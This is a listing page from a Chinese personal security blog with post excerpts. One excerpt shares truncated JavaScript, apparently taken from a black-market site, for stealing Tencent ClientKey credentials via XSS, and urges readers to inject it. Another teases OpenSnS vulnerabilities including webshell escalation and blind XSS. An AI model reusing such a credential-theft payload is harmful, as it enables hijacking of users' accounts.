在你的博客、网站、论坛等页面添加二维码使用手机阅读

在你的博客、网站、论坛等页面添加二维码使用手机阅读

有时候,我们经常会发现文章读了一半,零时有事需要离开电脑,我们是多么希望帖子末尾有那么一个二维码,手机一扫,咱们直接带走。这个功能网上应该算是非常多了的,各种实现方法也很多,但作为懒癌患者,我真不愿意去研究那么多,能一句话实现的东西,为什么要搞那么麻烦呢?。那么今天给大家带来一个快速实现的方法。一行代码,查到相应位置就行了。以Typecho 1.x为例,在你当前使用的风格模版的文章页面直接插...

作者: 0 条评论
发一枚无意中拿到的JS,用于获取腾讯ClientKey

发一枚无意中拿到的JS,用于获取腾讯ClientKey

无意中日了某个搞黑产的站,他们专门拿腾讯XSS来获取ClientKey,应该是广告群发,或者其他用途。有腾讯的XSS调用下面JS插进去你就爽了,爽了就爽了递交给腾讯赚个几十QB就行了。。。别折腾了,心累。JS如下:document.domain = "qq.com"; // var xjq = document.createElement('script'); // xj...

作者: 0 条评论
OpenSnS全版本后台功能逻辑缺陷可以提权WebShell/XSS漏洞可盲打/GET重置密码

OpenSnS全版本后台功能逻辑缺陷可以提权WebShell/XSS漏洞可盲打/GET重置密码

闲来无事,一直都有给想天(ourstu)做安全方面的测试,又到一年年末,所以又去看了下,发现大大小小漏洞其实还是不少的。想天旗下的opensns是一套不错的开源社交系统,模块化的功能也非常易于使用。opensns基于thinkPHP开发,也易于二次开发使用。我应该是最早给想天挖漏洞的吧?在opensns还叫thinkox的时候大约2014年,我就发过一枚ThinkOX全版本通杀getshel...

作者: 1 条评论
2019起点·为了活着而活着

2019起点·为了活着而活着

回想起08年至今,浑浑噩噩,如今亦是如此。没有目标,亦没有钱,更觉得没有前途,连曾经的梦想也都早就丢的一干二净了。网站也建过不少,软件也写过不少,漏洞也挖了一些,却从未真正定位过自己到底想要做点什么。什么都会,又好像什么都不会,说难听点就是瞎折腾,属于没有利益的自己折腾自己,以此来证明我TMD还活着,仅仅只是活着。 活着是好事,对于我这种人生跌宕起伏的如同电影话剧一般的人来讲,我还活着就是...

作者: 0 条评论
今天安新家~欢迎来我的新家

今天安新家~欢迎来我的新家

或许今后就这样了,年纪大了,累了,不想再折腾了。至此安家落户,博客、代码、泡面、咖啡。

作者: 3 条评论